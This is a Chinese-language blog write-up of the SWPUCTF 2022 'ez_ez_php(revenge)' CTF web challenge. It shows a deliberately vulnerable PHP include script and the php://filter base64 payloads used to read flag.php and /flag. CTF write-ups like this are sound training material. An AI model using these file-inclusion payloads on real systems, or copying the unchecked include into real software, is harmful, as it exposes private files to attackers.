SWPUCTF 2022 新生赛ez_ez_php(revenge)

2025-4-07 18:09

CTF,CTF-web,NSSCTF

946

120 字

3 分钟

本文最后更新于442 天前，其中的信息可能已经过时，如有错误请发送邮件到big_fw@foxmail.com

Pasted image 20250407175124.png

一、访问网站

Pasted image 20250407175143.png

二、分析代码

<?php  
error_reporting(0);  
if (isset($_GET['file'])) {  
    if ( substr($_GET["file"], 0, 3) === "php" ) {  
        echo "Nice!!!";  
        include($_GET["file"]);  
    }   
  
    else {  
        echo "Hacker!!";  
    }  
}else {    highlight_file(__FILE__);  
}  
//flag.php

substr($_GET["file"], 0, 3) === "php"

该代码会截取输入的前三个是否是php，可以想到是php伪协议

三、使用php伪协议

file=php://filter/read=convert.base64-encode/resource=flag.php

Pasted image 20250407180036.png

解码后发现flag不在这里，并且出现提示
Pasted image 20250407175926.png

四、读取/flag文件

file=php://filter/read=convert.base64-encode/resource=/flag

Pasted image 20250407180220.png

成功获取flag
Pasted image 20250407180146.png

总结

php伪协议
filter伪协议

文末附加内容

PHP伪协议文件包含

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!

一、访问网站

二、分析代码

三、使用php伪协议

四、读取/flag文件

总结

发送评论 编辑评论

推荐文章

发送评论编辑评论